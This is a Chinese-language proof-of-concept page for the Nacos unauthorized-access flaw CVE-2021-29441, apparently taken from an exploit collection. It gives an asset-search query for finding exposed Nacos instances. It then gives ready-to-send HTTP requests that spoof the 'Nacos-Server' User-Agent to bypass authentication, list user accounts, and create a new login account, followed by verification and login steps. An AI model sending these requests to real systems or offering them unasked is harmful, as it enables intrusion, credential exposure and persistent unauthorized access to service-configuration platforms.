POC/wpoc/Nacos/Nacos未授权访问漏洞(CVE-2021-29441).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

77 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Nacos未授权访问漏洞(CVE-2021-29441)
# 一、漏洞简介
<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时会判断请求的user-agent是否为”Nacos-Server”如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单并且将协商好的user-agent设置为Nacos-Server直接硬编码在了代码里导致了漏洞的出现。并且利用这个未授权漏洞攻击者可以获取到用户名密码等敏感信息。</font>
# <font style="color:rgb(63, 63, 63);">二、影响版本</font>
+ <font style="color:rgb(63, 63, 63);">Nacos <= 2.0.0-ALPHA.1</font>
# <font style="color:rgb(63, 63, 63);">三、资产测绘</font>
+ hunter`app.name="Nacos"`
+ 特征
![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/MraeKPVNc9lFkzMT/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-600623.png)
# 四、漏洞复现
poc
```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```
![1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48.png](./img/MraeKPVNc9lFkzMT/1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48-585785.png)
通过未授权访问漏洞添加账号
```plain
POST /nacos/v1/auth/users HTTP/1.1
Host:
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=test&password=test
```
![1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6.png](./img/MraeKPVNc9lFkzMT/1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6-376550.png)
查看是否添加成功
```plain
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Host:
```
![1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839.png](./img/MraeKPVNc9lFkzMT/1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839-049495.png)
使用添加的账号登录
![1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d.png](./img/MraeKPVNc9lFkzMT/1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d-182574.png)
> 更新: 2024-10-28 15:59:45
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za>